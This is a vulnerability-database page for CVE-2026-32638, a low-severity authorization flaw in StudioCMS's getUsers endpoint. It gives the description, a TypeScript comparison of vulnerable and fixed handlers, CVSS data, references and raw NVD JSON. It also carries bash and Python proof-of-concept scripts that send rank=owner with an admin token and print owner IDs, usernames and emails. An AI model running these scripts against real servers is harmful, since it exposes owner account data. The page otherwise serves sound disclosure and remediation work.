Security Vulnerability Report
CVE-2026-32638 CVSS 2.7 LOW

CVE-2026-32638

Published: 2026-03-18 21:16:27
Last Modified: 2026-03-19 18:40:32

Description

StudioCMS is a server-side-rendered, Astro native, headless content management system. Prior to 0.4.4, the REST API `getUsers` endpoint in StudioCMS uses the attacker-controlled `rank` query parameter to decide whether owner accounts should be filtered from the result set. As a result, an admin token can request `rank=owner` and receive owner account records, including IDs, usernames, display names, and email addresses, even though the adjacent `getUser` endpoint correctly blocks admins from viewing owner users. This is an authorization inconsistency inside the same user-management surface. Version 0.4.4 fixes the issue.
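The flaw described above is a single wrong input to an authorization decision: the server asks the request ("did the client send `rank=owner`?") instead of the caller's identity ("is the requester an owner?") whether owner records may be returned. The sketch below, added here as an illustration and not taken from the StudioCMS code base, puts the vulnerable shape of such a handler beside a hardened one that shares its rule with the single-record lookup, so the list and detail endpoints can no longer disagree. The `Rank` type, the `UserRecord` shape, the `USERS` sample table and the function names are all constructed for the example; only the endpoint name, the `rank` query parameter and the leaked fields (id, username, displayName, email) come from the advisory.

```typescript
// Added example for CVE-2026-32638: not StudioCMS source. The data model,
// handler names and sample users below are assumptions made to show the pattern.

type Rank = "owner" | "admin" | "editor" | "visitor";

interface UserRecord {
  id: string;
  username: string;
  displayName: string;
  email: string;
  rank: Rank;
}

// Constructed sample directory standing in for the CMS user table.
const USERS: UserRecord[] = [
  { id: "u1", username: "root",  displayName: "Site Owner", email: "owner@example.test", rank: "owner" },
  { id: "u2", username: "alice", displayName: "Alice",      email: "alice@example.test", rank: "admin" },
  { id: "u3", username: "bob",   displayName: "Bob",        email: "bob@example.test",   rank: "editor" },
];

// The one place the "who may see owners" rule lives. It depends only on the
// caller's rank, which the server establishes from the token, never on the query.
function mayViewOwners(callerRank: Rank): boolean {
  return callerRank === "owner";
}

// Vulnerable shape: whether owners are hidden is decided by the client-supplied
// `rank` parameter. The caller's rank is never consulted, so an admin that sends
// ?rank=owner simply switches the filter off.
function getUsersVulnerable(_callerRank: Rank, query: { rank?: string }): UserRecord[] {
  const includeOwners = query.rank === "owner";
  let rows = USERS;
  if (query.rank !== undefined) rows = rows.filter((u) => u.rank === query.rank);
  if (!includeOwners) rows = rows.filter((u) => u.rank !== "owner");
  return rows;
}

// Hardened shape: the query may narrow the result set, but owner visibility is
// gated by mayViewOwners(callerRank) regardless of what the query asked for.
function getUsersFixed(callerRank: Rank, query: { rank?: string }): UserRecord[] {
  let rows = USERS;
  if (query.rank !== undefined) rows = rows.filter((u) => u.rank === query.rank);
  if (!mayViewOwners(callerRank)) rows = rows.filter((u) => u.rank !== "owner");
  return rows;
}

// Single-record lookup using the same rule, so list and detail endpoints agree.
function getUser(callerRank: Rank, id: string): UserRecord | null {
  const user = USERS.find((u) => u.id === id) ?? null;
  if (user === null) return null;
  if (user.rank === "owner" && !mayViewOwners(callerRank)) return null;
  return user;
}

// Stand-alone demonstration: an admin asking for ?rank=owner.
console.log("vulnerable:", getUsersVulnerable("admin", { rank: "owner" }).map((u) => u.username)); // ["root"]
console.log("fixed:     ", getUsersFixed("admin", { rank: "owner" }).map((u) => u.username));      // []
```

The point of the hardened version is not the extra `if` but where the decision comes from: every path that can return a user record funnels through `mayViewOwners`, so a reviewer checking `getUser` has also checked `getUsers`. A useful regression test for this class of bug is to call every listing endpoint with each privilege level and with the query parameters set to request the most privileged records, and assert that the result never contains a record the single-record endpoint would refuse.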

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:studiocms:studiocms:*:*:*:*:*:*:*:* - VULNERABLE
StudioCMS < 0.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2026-32638 PoC - StudioCMS getUsers Authorization Bypass
# This script demonstrates how an admin token can bypass authorization to access owner accounts

TARGET_URL="http://target-server/api"
ADMIN_TOKEN="your_admin_token_here"

echo "[*] Testing CVE-2026-32638: StudioCMS getUsers Authorization Bypass"
echo "[*] Target: $TARGET_URL"

# Step 1: Normal admin request (should not see owner accounts)
echo -e "\n[+] Step 1: Normal getUsers request (admin token)"
curl -s -X GET "$TARGET_URL/getUsers" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" | jq .

# Step 2: Bypass request with rank=owner parameter
echo -e "\n[+] Step 2: Bypass request with rank=owner parameter"
curl -s -X GET "$TARGET_URL/getUsers?rank=owner" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" | jq .

# Step 3: Extract owner account information
echo -e "\n[+] Extracted owner account information:"
curl -s -X GET "$TARGET_URL/getUsers?rank=owner" \
  -H "Authorization: Bearer $ADMIN_TOKEN" \
  -H "Content-Type: application/json" | jq '.[] | {id, username, displayName, email}'

echo -e "\n[!] If owner accounts are returned, the vulnerability is confirmed."

python
# Python PoC
import requests


def exploit_cve_2026_32638(target_url, admin_token):
    """
    Exploit for CVE-2026-32638
    StudioCMS getUsers endpoint authorization bypass
    """
    headers = {
        'Authorization': f'Bearer {admin_token}',
        'Content-Type': 'application/json',
    }

    # Normal request - should filter owner accounts
    normal_response = requests.get(f'{target_url}/getUsers', headers=headers)
    print(f'[-] Normal request status: {normal_response.status_code}')

    # Bypass request - using rank=owner parameter
    bypass_params = {'rank': 'owner'}
    bypass_response = requests.get(
        f'{target_url}/getUsers',
        params=bypass_params,
        headers=headers,
    )
    print(f'[+] Bypass request status: {bypass_response.status_code}')

    # Only parse the body on success; a non-200 reply need not be JSON
    if bypass_response.status_code != 200:
        return None

    owners = bypass_response.json()
    print(f'[+] Found {len(owners)} owner account(s):')
    for owner in owners:
        print(f'  - ID: {owner.get("id")}')
        print(f'    Username: {owner.get("username")}')
        print(f'    Email: {owner.get("email")}')
        print(f'    Display Name: {owner.get("displayName")}')

    return owners


if __name__ == '__main__':
    exploit_cve_2026_32638('http://target-server/api', 'your_admin_token_here')

References

- Patch: https://github.com/withstudiocms/studiocms/commit/aebe8bcb3618bb07c6753e3f5c982c1fe6adea64
- Product, Release Notes: https://github.com/withstudiocms/studiocms/releases/tag/[email protected]
- Exploit, Mitigation, Vendor Advisory: https://github.com/withstudiocms/studiocms/security/advisories/GHSA-xvf4-ch4q-2m24

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32638", "sourceIdentifier": "[email protected]", "published": "2026-03-18T21:16:26.770", "lastModified": "2026-03-19T18:40:31.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "StudioCMS is a server-side-rendered, Astro native, headless content management system. Prior to 0.4.4, the REST API `getUsers` endpoint in StudioCMS uses the attacker-controlled `rank` query parameter to decide whether owner accounts should be filtered from the result set. As a result, an admin token can request `rank=owner` and receive owner account records, including IDs, usernames, display names, and email addresses, even though the adjacent `getUser` endpoint correctly blocks admins from viewing owner users. This is an authorization inconsistency inside the same user-management surface. Version 0.4.4 fixes the issue."}, {"lang": "es", "value": "StudioCMS es un sistema de gestión de contenido sin cabeza, nativo de Astro y renderizado en el lado del servidor. Antes de la versión 0.4.4, el endpoint `getUsers` de la API REST en StudioCMS utiliza el parámetro de consulta `rank` controlado por el atacante para decidir si las cuentas de propietario deben filtrarse del conjunto de resultados. Como resultado, un token de administrador puede solicitar `rank=owner` y recibir registros de cuentas de propietario, incluyendo IDs, nombres de usuario, nombres para mostrar y direcciones de correo electrónico, a pesar de que el endpoint adyacente `getUser` bloquea correctamente a los administradores para que no vean a los usuarios propietarios. Esto es una inconsistencia de autorización dentro de la misma superficie de gestión de usuarios. La versión 0.4.4 soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:studiocms:studiocms:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.4.4", "matchCriteriaId": "EF77B4D2-70E1-4F62-AE18-5726017098A2"}]}]}], "references": [{"url": "https://github.com/withstudiocms/studiocms/commit/aebe8bcb3618bb07c6753e3f5c982c1fe6adea64", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/withstudiocms/studiocms/releases/tag/[email protected]", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/withstudiocms/studiocms/security/advisories/GHSA-xvf4-ch4q-2m24", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}